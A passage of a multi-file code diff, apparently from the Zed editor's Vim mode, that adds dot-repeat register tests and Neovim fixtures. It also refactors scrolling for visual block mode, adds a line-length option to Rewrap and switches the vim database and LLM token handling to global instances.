if let Some(mode) = mode {
self.switch_mode(mode, false, window, cx)
@@ -441,6 +459,207 @@ mod test {
cx.shared_state().await.assert_eq("THE QUICK ˇbrown fox");
}
+ #[gpui::test]
+ async fn test_dot_repeat_registers_paste(cx: &mut gpui::TestAppContext) {
+ let mut cx = NeovimBackedTestContext::new(cx).await;
+
+ // basic paste repeat uses the unnamed register
+ cx.set_shared_state("ˇhello\n").await;
+ cx.simulate_shared_keystrokes("y y p").await;
+ cx.shared_state().await.assert_eq("hello\nˇhello\n");
+ cx.simulate_shared_keystrokes(".").await;
+ cx.shared_state().await.assert_eq("hello\nhello\nˇhello\n");
+
+ // "_ (blackhole) is recorded and replayed, so the pasted text is still
+ // the original yanked line.
+ cx.set_shared_state(indoc! {"
+ ˇone
+ two
+ three
+ four
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("y y j \" _ d d . p").await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ one
+ four
+ ˇone
+ "});
+
+ // the recorded register is replayed, not whatever is in the unnamed register
+ cx.set_shared_state(indoc! {"
+ ˇone
+ two
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("y y j \" a y y \" a p .")
+ .await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ one
+ two
+ two
+ ˇtwo
+ "});
+
+ // `"X.` ignores the override and always uses the recorded register.
+ // Both `dd` calls go into register `a`, so register `b` is empty and
+ // `"bp` pastes nothing.
+ cx.set_shared_state(indoc! {"
+ ˇone
+ two
+ three
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("\" a d d \" b .").await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ ˇthree
+ "});
+ cx.simulate_shared_keystrokes("\" a p \" b p").await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ three
+ ˇtwo
+ "});
+
+ // numbered registers cycle on each dot repeat: "1p . . uses registers 2, 3, …
+ // Since the cycling behavior caps at register 9, the first line to be
+        // deleted, `one`, is no longer in any of the registers.
+ cx.set_shared_state(indoc! {"
+ ˇone
+ two
+ three
+ four
+ five
+ six
+ seven
+ eight
+ nine
+ ten
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("d d . . . . . . . . .").await;
+ cx.shared_state().await.assert_eq(indoc! {"ˇ"});
+ cx.simulate_shared_keystrokes("\" 1 p . . . . . . . . .")
+ .await;
+ cx.shared_state().await.assert_eq(indoc! {"
+
+ ten
+ nine
+ eight
+ seven
+ six
+ five
+ four
+ three
+ two
+ ˇtwo"});
+
+ // unnamed register repeat: dd records None, so . pastes the same
+ // deleted text
+ cx.set_shared_state(indoc! {"
+ ˇone
+ two
+ three
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("d d p .").await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ two
+ one
+ ˇone
+ three
+ "});
+
+ // After `"1p` cycles to `2`, using `"ap` resets recorded_register to `a`,
+        // so the next `.` uses `a` and not `3`.
+ cx.set_shared_state(indoc! {"
+ one
+ two
+ ˇthree
+ "})
+ .await;
+ cx.simulate_shared_keystrokes("\" 2 y y k k \" a y y j \" 1 y y k \" 1 p . \" a p .")
+ .await;
+ cx.shared_state().await.assert_eq(indoc! {"
+ one
+ two
+ three
+ one
+ ˇone
+ two
+ three
+ "});
+ }
+
+ // This needs to be a separate test from `test_dot_repeat_registers_paste`
+ // as Neovim doesn't have support for using registers in replace operations
+ // by default.
+ #[gpui::test]
+ async fn test_dot_repeat_registers_replace(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+
+ cx.set_state(
+ indoc! {"
+ line ˇone
+ line two
+ line three
+ "},
+ Mode::Normal,
+ );
+
+ // 1. Yank `one` into register `a`
+ // 2. Move down and yank `two` into the default register
+ // 3. Replace `two` with the contents of register `a`
+ cx.simulate_keystrokes("\" a y w j y w \" a g R w");
+ cx.assert_state(
+ indoc! {"
+ line one
+ line onˇe
+ line three
+ "},
+ Mode::Normal,
+ );
+
+ // 1. Move down to `three`
+ // 2. Repeat the replace operation
+ cx.simulate_keystrokes("j .");
+ cx.assert_state(
+ indoc! {"
+ line one
+ line one
+ line onˇe
+ "},
+ Mode::Normal,
+ );
+
+ // Similar test, but this time using numbered registers, as those should
+        // automatically increase on successive uses of `.`.
+ cx.set_state(
+ indoc! {"
+ line ˇone
+ line two
+ line three
+ line four
+ "},
+ Mode::Normal,
+ );
+
+ // 1. Yank `one` into register `1`
+ // 2. Yank `two` into register `2`
+ // 3. Move down and yank `three` into the default register
+ // 4. Replace `three` with the contents of register `1`
+ // 5. Move down and repeat
+ cx.simulate_keystrokes("\" 1 y w j \" 2 y w j y w \" 1 g R w j .");
+ cx.assert_state(
+ indoc! {"
+ line one
+ line two
+ line one
+ line twˇo
+ "},
+ Mode::Normal,
+ );
+ }
+
#[gpui::test]
async fn test_repeat_ime(cx: &mut gpui::TestAppContext) {
let mut cx = VimTestContext::new(cx, true).await;
@@ -88,82 +88,74 @@ pub fn register(editor: &mut Editor, cx: &mut Context<Vim>) {
impl Vim {
fn scroll(
&mut self,
- move_cursor: bool,
+ preserve_cursor_position: bool,
window: &mut Window,
cx: &mut Context<Self>,
by: fn(c: Option<f32>) -> ScrollAmount,
) {
let amount = by(Vim::take_count(cx).map(|c| c as f32));
- let mode = self.mode;
Vim::take_forced_motion(cx);
self.exit_temporary_normal(window, cx);
- self.update_editor(cx, |_, editor, cx| {
- scroll_editor(editor, mode, move_cursor, amount, window, cx)
- });
+ self.scroll_editor(preserve_cursor_position, amount, window, cx);
}
-}
-fn scroll_editor(
- editor: &mut Editor,
- mode: Mode,
- preserve_cursor_position: bool,
- amount: ScrollAmount,
- window: &mut Window,
- cx: &mut Context<Editor>,
-) {
- let should_move_cursor = editor.newest_selection_on_screen(cx).is_eq();
- let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx));
- let old_top = editor
- .scroll_manager
- .scroll_top_display_point(&display_snapshot, cx);
-
- if editor.scroll_hover(amount, window, cx) {
- return;
- }
+ fn scroll_editor(
+ &mut self,
+ preserve_cursor_position: bool,
+ amount: ScrollAmount,
+ window: &mut Window,
+ cx: &mut Context<Vim>,
+ ) {
+ self.update_editor(cx, |vim, editor, cx| {
+ let should_move_cursor = editor.newest_selection_on_screen(cx).is_eq();
+ let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx));
+ let old_top = editor
+ .scroll_manager
+ .scroll_top_display_point(&display_snapshot, cx);
+
+ if editor.scroll_hover(amount, window, cx) {
+ return;
+ }
- let full_page_up = amount.is_full_page() && amount.direction().is_upwards();
- let amount = match (amount.is_full_page(), editor.visible_line_count()) {
- (true, Some(visible_line_count)) => {
- if amount.direction().is_upwards() {
- ScrollAmount::Line((amount.lines(visible_line_count) + 1.0) as f32)
- } else {
- ScrollAmount::Line((amount.lines(visible_line_count) - 1.0) as f32)
+ let full_page_up = amount.is_full_page() && amount.direction().is_upwards();
+ let amount = match (amount.is_full_page(), editor.visible_line_count()) {
+ (true, Some(visible_line_count)) => {
+ if amount.direction().is_upwards() {
+ ScrollAmount::Line((amount.lines(visible_line_count) + 1.0) as f32)
+ } else {
+ ScrollAmount::Line((amount.lines(visible_line_count) - 1.0) as f32)
+ }
+ }
+ _ => amount,
+ };
+
+ editor.scroll_screen(&amount, window, cx);
+ if !should_move_cursor {
+ return;
}
- }
- _ => amount,
- };
- editor.scroll_screen(&amount, window, cx);
- if !should_move_cursor {
- return;
- }
+ let Some(visible_line_count) = editor.visible_line_count() else {
+ return;
+ };
- let Some(visible_line_count) = editor.visible_line_count() else {
- return;
- };
+ let Some(visible_column_count) = editor.visible_column_count() else {
+ return;
+ };
- let Some(visible_column_count) = editor.visible_column_count() else {
- return;
- };
+ let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx));
+ let top = editor
+ .scroll_manager
+ .scroll_top_display_point(&display_snapshot, cx);
+ let vertical_scroll_margin = EditorSettings::get_global(cx).vertical_scroll_margin;
- let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx));
- let top = editor
- .scroll_manager
- .scroll_top_display_point(&display_snapshot, cx);
- let vertical_scroll_margin = EditorSettings::get_global(cx).vertical_scroll_margin;
-
- editor.change_selections(
- SelectionEffects::no_scroll().nav_history(false),
- window,
- cx,
- |s| {
- s.move_with(&mut |map, selection| {
+ let mut move_cursor = |map: &editor::display_map::DisplaySnapshot,
+ mut head: DisplayPoint,
+ goal: SelectionGoal| {
// TODO: Improve the logic and function calls below to be dependent on
// the `amount`. If the amount is vertical, we don't care about
// columns, while if it's horizontal, we don't care about rows,
// so we don't need to calculate both and deal with logic for
// both.
- let mut head = selection.head();
let max_point = map.max_point();
let starting_column = head.column();
@@ -171,17 +163,18 @@ fn scroll_editor(
(vertical_scroll_margin as u32).min(visible_line_count as u32 / 2);
if preserve_cursor_position {
- let new_row = if old_top.row() == top.row() {
- DisplayRow(
- head.row()
- .0
- .saturating_add_signed(amount.lines(visible_line_count) as i32),
- )
- } else {
- DisplayRow(top.row().0.saturating_add_signed(
- selection.head().row().0 as i32 - old_top.row().0 as i32,
- ))
- };
+ let new_row =
+ if old_top.row() == top.row() {
+ DisplayRow(
+ head.row()
+ .0
+ .saturating_add_signed(amount.lines(visible_line_count) as i32),
+ )
+ } else {
+ DisplayRow(top.row().0.saturating_add_signed(
+ head.row().0 as i32 - old_top.row().0 as i32,
+ ))
+ };
head = map.clip_point(DisplayPoint::new(new_row, head.column()), Bias::Left)
}
@@ -259,17 +252,36 @@ fn scroll_editor(
let new_head = map.clip_point(DisplayPoint::new(new_row, new_column), Bias::Left);
let goal = match amount {
ScrollAmount::Column(_) | ScrollAmount::PageWidth(_) => SelectionGoal::None,
- _ => selection.goal,
+ _ => goal,
};
- if selection.is_empty() || !mode.is_visual() {
- selection.collapse_to(new_head, goal)
- } else {
- selection.set_head(new_head, goal)
- };
- })
- },
- );
+ Some((new_head, goal))
+ };
+
+ if vim.mode == Mode::VisualBlock {
+ vim.visual_block_motion(true, editor, window, cx, &mut move_cursor);
+ } else {
+ editor.change_selections(
+ SelectionEffects::no_scroll().nav_history(false),
+ window,
+ cx,
+ |s| {
+ s.move_with(&mut |map, selection| {
+ if let Some((new_head, goal)) =
+ move_cursor(map, selection.head(), selection.goal)
+ {
+ if selection.is_empty() || !vim.mode.is_visual() {
+ selection.collapse_to(new_head, goal)
+ } else {
+ selection.set_head(new_head, goal)
+ }
+ }
+ })
+ },
+ );
+ }
+ });
+ }
}
#[cfg(test)]
@@ -282,12 +282,12 @@ impl Vim {
/// Pastes the clipboard contents, replacing the same number of characters
/// as the clipboard's contents.
pub fn paste_replace(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- let clipboard_text =
- cx.read_from_clipboard()
- .and_then(|item| match item.entries().first() {
- Some(ClipboardEntry::String(text)) => Some(text.text().to_string()),
- _ => None,
- });
+ let clipboard_text = cx.read_from_clipboard().and_then(|item| {
+ item.entries().iter().find_map(|entry| match entry {
+ ClipboardEntry::String(text) => Some(text.text().to_string()),
+ _ => None,
+ })
+ });
if let Some(text) = clipboard_text {
self.push_operator(Operator::Replace, window, cx);
@@ -1,19 +1,20 @@
use crate::{Vim, motion::Motion, object::Object, state::Mode};
use collections::HashMap;
use editor::{Bias, Editor, RewrapOptions, SelectionEffects, display_map::ToDisplayPoint};
-use gpui::{Context, Window, actions};
+use gpui::{Action, Context, Window};
use language::SelectionGoal;
+use schemars::JsonSchema;
+use serde::Deserialize;
-actions!(
- vim,
- [
- /// Rewraps the selected text to fit within the line width.
- Rewrap
- ]
-);
+/// Rewraps the selected text to fit within the line width.
+#[derive(Clone, Deserialize, JsonSchema, PartialEq, Action)]
+#[action(namespace = vim)]
+pub(crate) struct Rewrap {
+ pub line_length: Option<usize>,
+}
pub(crate) fn register(editor: &mut Editor, cx: &mut Context<Vim>) {
- Vim::action(editor, cx, |vim, _: &Rewrap, window, cx| {
+ Vim::action(editor, cx, |vim, action: &Rewrap, window, cx| {
vim.record_current_action(cx);
Vim::take_count(cx);
Vim::take_forced_motion(cx);
@@ -24,6 +25,7 @@ pub(crate) fn register(editor: &mut Editor, cx: &mut Context<Vim>) {
editor.rewrap_impl(
RewrapOptions {
override_language_settings: true,
+ line_length: action.line_length,
..Default::default()
},
cx,
@@ -73,6 +73,10 @@ impl Mode {
Self::Normal | Self::Insert | Self::Replace | Self::HelixNormal => false,
}
}
+
+ pub fn is_helix(&self) -> bool {
+ matches!(self, Self::HelixNormal | Self::HelixSelect)
+ }
}
#[derive(Clone, Debug, PartialEq)]
@@ -187,14 +191,15 @@ impl From<Register> for ClipboardItem {
impl From<ClipboardItem> for Register {
fn from(item: ClipboardItem) -> Self {
- // For now, we don't store metadata for multiple entries.
- match item.entries().first() {
- Some(ClipboardEntry::String(value)) if item.entries().len() == 1 => Register {
+ match item.entries().iter().find_map(|entry| match entry {
+ ClipboardEntry::String(value) => Some(value),
+ _ => None,
+ }) {
+ Some(value) => Register {
text: value.text().to_owned().into(),
clipboard_selections: value.metadata_json::<Vec<ClipboardSelection>>(),
},
- // For now, registers can't store images. This could change in the future.
- _ => Register::default(),
+ None => Register::default(),
}
}
}
@@ -228,7 +233,15 @@ pub struct VimGlobals {
pub recorded_actions: Vec<ReplayableAction>,
pub recorded_selection: RecordedSelection,
+ /// The register being written to by the active `q{register}` macro
+ /// recording.
pub recording_register: Option<char>,
+ /// The register that was selected at the start of the current
+ /// dot-recording, for example, `"ap`.
+ pub recording_register_for_dot: Option<char>,
+ /// The register from the last completed dot-recording. Used when replaying
+ /// with `.`.
+ pub recorded_register_for_dot: Option<char>,
pub last_recorded_register: Option<char>,
pub last_replayed_register: Option<char>,
pub replayer: Option<Replayer>,
@@ -310,10 +323,11 @@ impl MarksState {
let Some(workspace_id) = this.update(cx, |this, cx| this.workspace_id(cx)).ok()? else {
return None;
};
+ let db = cx.update(|cx| VimDb::global(cx));
let (marks, paths) = cx
.background_spawn(async move {
- let marks = DB.get_marks(workspace_id)?;
- let paths = DB.get_global_marks_paths(workspace_id)?;
+ let marks = db.get_marks(workspace_id)?;
+ let paths = db.get_global_marks_paths(workspace_id)?;
anyhow::Ok((marks, paths))
})
.await
@@ -432,8 +446,9 @@ impl MarksState {
if let Some(workspace_id) = self.workspace_id(cx) {
let path = path.clone();
let key = key.clone();
+ let db = VimDb::global(cx);
cx.background_spawn(async move {
- DB.set_global_mark_path(workspace_id, key, path).await
+ db.set_global_mark_path(workspace_id, key, path).await
})
.detach_and_log_err(cx);
}
@@ -449,8 +464,9 @@ impl MarksState {
self.serialized_marks.insert(path.clone(), new_points);
if let Some(workspace_id) = self.workspace_id(cx) {
+ let db = VimDb::global(cx);
cx.background_spawn(async move {
- DB.set_marks(workspace_id, path.clone(), to_write).await?;
+ db.set_marks(workspace_id, path.clone(), to_write).await?;
anyhow::Ok(())
})
.detach_and_log_err(cx);
@@ -515,7 +531,7 @@ impl MarksState {
cx: &mut Context<Self>,
) {
let on_change = cx.subscribe(buffer_handle, move |this, buffer, event, cx| match event {
- BufferEvent::Edited => {
+ BufferEvent::Edited { .. } => {
if let Some(path) = this.path_for_buffer(&buffer, cx) {
this.serialize_buffer_marks(path, &buffer, cx);
}
@@ -643,8 +659,9 @@ impl MarksState {
let path = if let Some(target) = self.global_marks.get(&mark_name.clone()) {
let name = mark_name.clone();
if let Some(workspace_id) = self.workspace_id(cx) {
+ let db = VimDb::global(cx);
cx.background_spawn(async move {
- DB.delete_global_marks_path(workspace_id, name).await
+ db.delete_global_marks_path(workspace_id, name).await
})
.detach_and_log_err(cx);
}
@@ -684,7 +701,8 @@ impl MarksState {
.get_mut(&path)
.map(|m| m.remove(&mark_name.clone()));
if let Some(workspace_id) = self.workspace_id(cx) {
- cx.background_spawn(async move { DB.delete_mark(workspace_id, path, mark_name).await })
+ let db = VimDb::global(cx);
+ cx.background_spawn(async move { db.delete_mark(workspace_id, path, mark_name).await })
.detach_and_log_err(cx);
}
}
@@ -915,6 +933,7 @@ impl VimGlobals {
self.dot_recording = false;
self.recorded_actions = std::mem::take(&mut self.recording_actions);
self.recorded_count = self.recording_count.take();
+ self.recorded_register_for_dot = self.recording_register_for_dot.take();
self.stop_recording_after_next_action = false;
}
}
@@ -942,6 +961,7 @@ impl VimGlobals {
self.dot_recording = false;
self.recorded_actions = std::mem::take(&mut self.recording_actions);
self.recorded_count = self.recording_count.take();
+ self.recorded_register_for_dot = self.recording_register_for_dot.take();
self.stop_recording_after_next_action = false;
}
}
@@ -1750,7 +1770,7 @@ impl Domain for VimDb {
];
}
-db::static_connection!(DB, VimDb, [WorkspaceDb]);
+db::static_connection!(VimDb, [WorkspaceDb]);
struct SerializedMark {
path: Arc<Path>,
@@ -30,6 +30,7 @@ impl VimTestContext {
theme::init(theme::LoadThemes::JustBase, cx);
settings_ui::init(cx);
markdown_preview::init(cx);
+ zed_actions::init();
});
}
@@ -635,7 +635,7 @@ impl Vim {
fn activate(editor: &mut Editor, window: &mut Window, cx: &mut Context<Editor>) {
let vim = Vim::new(window, cx);
let state = vim.update(cx, |vim, cx| {
- if !editor.mode().is_full() {
+ if !editor.use_modal_editing() {
vim.mode = Mode::Insert;
}
@@ -996,7 +996,14 @@ impl Vim {
cx: &mut Context<Vim>,
f: impl Fn(&mut Vim, &A, &mut Window, &mut Context<Vim>) + 'static,
) {
- let subscription = editor.register_action(cx.listener(f));
+ let subscription = editor.register_action(cx.listener(move |vim, action, window, cx| {
+ if !Vim::globals(cx).dot_replaying {
+ if vim.status_label.take().is_some() {
+ cx.notify();
+ }
+ }
+ f(vim, action, window, cx);
+ }));
cx.on_release(|_, _| drop(subscription)).detach();
}
@@ -1155,7 +1162,6 @@ impl Vim {
let last_mode = self.mode;
let prior_mode = self.last_mode;
let prior_tx = self.current_tx;
- self.status_label.take();
self.last_mode = last_mode;
self.mode = mode;
self.operator_stack.clear();
@@ -1586,6 +1592,7 @@ impl Vim {
globals.dot_recording = true;
globals.recording_actions = Default::default();
globals.recording_count = None;
+ globals.recording_register_for_dot = self.selected_register;
let selections = self.editor().map(|editor| {
editor.update(cx, |editor, cx| {
@@ -2070,7 +2077,7 @@ impl Vim {
input_enabled: self.editor_input_enabled(),
expects_character_input: self.expects_character_input(),
autoindent: self.should_autoindent(),
- cursor_offset_on_selection: self.mode.is_visual(),
+ cursor_offset_on_selection: self.mode.is_visual() || self.mode.is_helix(),
line_mode: matches!(self.mode, Mode::VisualLine),
hide_edit_predictions: !matches!(self.mode, Mode::Insert | Mode::Replace),
}
@@ -2092,6 +2099,11 @@ impl Vim {
editor.selections.set_line_mode(state.line_mode);
editor.set_edit_predictions_hidden_for_vim_mode(state.hide_edit_predictions, window, cx);
}
+
+ fn set_status_label(&mut self, label: impl Into<SharedString>, cx: &mut Context<Editor>) {
+ self.status_label = Some(label.into());
+ cx.notify();
+ }
}
struct VimEditorSettingsState {
@@ -1561,6 +1561,38 @@ mod test {
});
}
+ #[gpui::test]
+ async fn test_visual_block_insert_after_ctrl_d_scroll(cx: &mut gpui::TestAppContext) {
+ let mut cx = NeovimBackedTestContext::new(cx).await;
+ let shared_state_lines = (1..=10)
+ .map(|line_number| format!("{line_number:02}"))
+ .collect::<Vec<_>>()
+ .join("\n");
+ let shared_state = format!("ˇ{shared_state_lines}\n");
+
+ cx.set_scroll_height(5).await;
+ cx.set_shared_state(&shared_state).await;
+
+ cx.simulate_shared_keystrokes("ctrl-v ctrl-d").await;
+ cx.shared_state().await.assert_matches();
+
+ cx.simulate_shared_keystrokes("shift-i x escape").await;
+ cx.shared_state().await.assert_eq(indoc! {
+ "
+ ˇx01
+ x02
+ x03
+ x04
+ x05
+ 06
+ 07
+ 08
+ 09
+ 10
+ "
+ });
+ }
+
#[gpui::test]
async fn test_visual_block_wrapping_selection(cx: &mut gpui::TestAppContext) {
let mut cx = NeovimBackedTestContext::new(cx).await;
@@ -0,0 +1,125 @@
+{"Put":{"state":"ˇhello\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"p"}
+{"Get":{"state":"hello\nˇhello\n","mode":"Normal"}}
+{"Key":"."}
+{"Get":{"state":"hello\nhello\nˇhello\n","mode":"Normal"}}
+{"Put":{"state":"ˇtocopytext\n1\n2\n3\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"_"}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"."}
+{"Key":"p"}
+{"Get":{"state":"tocopytext\n3\nˇtocopytext\n","mode":"Normal"}}
+{"Put":{"state":"ˇtocopytext\n1\n2\n3\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"tocopytext\n1\n2\n3\nˇ1\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\n"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"\""}
+{"Key":"b"}
+{"Key":"."}
+{"Get":{"state":"ˇthree\n","mode":"Normal"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"\""}
+{"Key":"b"}
+{"Key":"p"}
+{"Get":{"state":"three\nˇtwo\n","mode":"Normal"}}
+{"Put":{"state":"ˇline one\nline two\n"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"\""}
+{"Key":"b"}
+{"Key":"."}
+{"Get":{"state":"line one\nline two\nline one\nline one\nˇline one\n","mode":"Normal"}}
+{"Put":{"state":"ˇ1\n2\n3\n4\n5\n6\n7\n8\n9\n"}}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Get":{"state":"ˇ","mode":"Normal"}}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Get":{"state":"\n9\n8\n7\n6\n5\n4\n3\n2\n1\nˇ1","mode":"Normal"}}
+{"Put":{"state":"ˇa\nb\nc\n"}}
+{"Key":"\""}
+{"Key":"9"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"\""}
+{"Key":"9"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"."}
+{"Get":{"state":"a\na\na\nˇa\nb\nc\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\n"}}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"two\none\nˇone\nthree\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\n"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"k"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"one\ntwo\n9\none\nˇone\ntwo\nthree\n","mode":"Normal"}}
@@ -0,0 +1,105 @@
+{"Put":{"state":"ˇhello\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"p"}
+{"Get":{"state":"hello\nˇhello\n","mode":"Normal"}}
+{"Key":"."}
+{"Get":{"state":"hello\nhello\nˇhello\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\nfour\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"_"}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"."}
+{"Key":"p"}
+{"Get":{"state":"one\nfour\nˇone\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"one\ntwo\ntwo\nˇtwo\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\n"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"\""}
+{"Key":"b"}
+{"Key":"."}
+{"Get":{"state":"ˇthree\n","mode":"Normal"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"\""}
+{"Key":"b"}
+{"Key":"p"}
+{"Get":{"state":"three\nˇtwo\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\nfour\nfive\nsix\nseven\neight\nnine\nten\n"}}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Get":{"state":"ˇ","mode":"Normal"}}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Get":{"state":"\nten\nnine\neight\nseven\nsix\nfive\nfour\nthree\ntwo\nˇtwo","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\n"}}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"two\none\nˇone\nthree\n","mode":"Normal"}}
+{"Put":{"state":"one\ntwo\nˇthree\n"}}
+{"Key":"\""}
+{"Key":"2"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"k"}
+{"Key":"k"}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"k"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"one\ntwo\nthree\none\nˇone\ntwo\nthree\n","mode":"Normal"}}
@@ -0,0 +1,10 @@
+{"SetOption":{"value":"scrolloff=3"}}
+{"SetOption":{"value":"lines=7"}}
+{"Put":{"state":"ˇ01\n02\n03\n04\n05\n06\n07\n08\n09\n10\n"}}
+{"Key":"ctrl-v"}
+{"Key":"ctrl-d"}
+{"Get":{"state":"«0ˇ»1\n«0ˇ»2\n«0ˇ»3\n«0ˇ»4\n«0ˇ»5\n06\n07\n08\n09\n10\n","mode":"VisualBlock"}}
+{"Key":"shift-i"}
+{"Key":"x"}
+{"Key":"escape"}
+{"Get":{"state":"ˇx01\nx02\nx03\nx04\nx05\n06\n07\n08\n09\n10\n","mode":"Normal"}}
@@ -12,4 +12,5 @@ workspace = true
path = "src/vim_mode_setting.rs"
[dependencies]
+gpui.workspace = true
settings.workspace = true
@@ -4,6 +4,7 @@
//! disable Vim/Helix modes without having to depend on the `vim` crate in its
//! entirety.
+use gpui::App;
use settings::{RegisterSetting, Settings, SettingsContent};
#[derive(RegisterSetting)]
@@ -15,9 +16,25 @@ impl Settings for VimModeSetting {
}
}
+impl VimModeSetting {
+ pub fn is_enabled(cx: &App) -> bool {
+ Self::try_get(cx)
+ .map(|vim_mode| vim_mode.0)
+ .unwrap_or(false)
+ }
+}
+
#[derive(RegisterSetting)]
pub struct HelixModeSetting(pub bool);
+impl HelixModeSetting {
+ pub fn is_enabled(cx: &App) -> bool {
+ Self::try_get(cx)
+ .map(|helix_mode| helix_mode.0)
+ .unwrap_or(false)
+ }
+}
+
impl Settings for HelixModeSetting {
fn from_settings(content: &SettingsContent) -> Self {
Self(content.helix_mode.unwrap())
@@ -5,9 +5,9 @@ use client::{Client, UserStore};
use cloud_api_types::OrganizationId;
use cloud_llm_client::{WebSearchBody, WebSearchResponse};
use futures::AsyncReadExt as _;
-use gpui::{App, AppContext, Context, Entity, Subscription, Task};
+use gpui::{App, AppContext, Context, Entity, Task};
use http_client::{HttpClient, Method};
-use language_model::{LlmApiToken, NeedsLlmTokenRefresh, RefreshLlmTokenListener};
+use language_model::{LlmApiToken, NeedsLlmTokenRefresh};
use web_search::{WebSearchProvider, WebSearchProviderId};
pub struct CloudWebSearchProvider {
@@ -26,34 +26,16 @@ pub struct State {
client: Arc<Client>,
user_store: Entity<UserStore>,
llm_api_token: LlmApiToken,
- _llm_token_subscription: Subscription,
}
impl State {
pub fn new(client: Arc<Client>, user_store: Entity<UserStore>, cx: &mut Context<Self>) -> Self {
- let refresh_llm_token_listener = RefreshLlmTokenListener::global(cx);
+ let llm_api_token = LlmApiToken::global(cx);
Self {
client,
user_store,
- llm_api_token: LlmApiToken::default(),
- _llm_token_subscription: cx.subscribe(
- &refresh_llm_token_listener,
- |this, _, _event, cx| {
- let client = this.client.clone();
- let llm_api_token = this.llm_api_token.clone();
- let organization_id = this
- .user_store
- .read(cx)
- .current_organization()
- .map(|o| o.id.clone());
- cx.spawn(async move |_this, _cx| {
- llm_api_token.refresh(&client, organization_id).await?;
- anyhow::Ok(())
- })
- .detach_and_log_err(cx);
- },
- ),
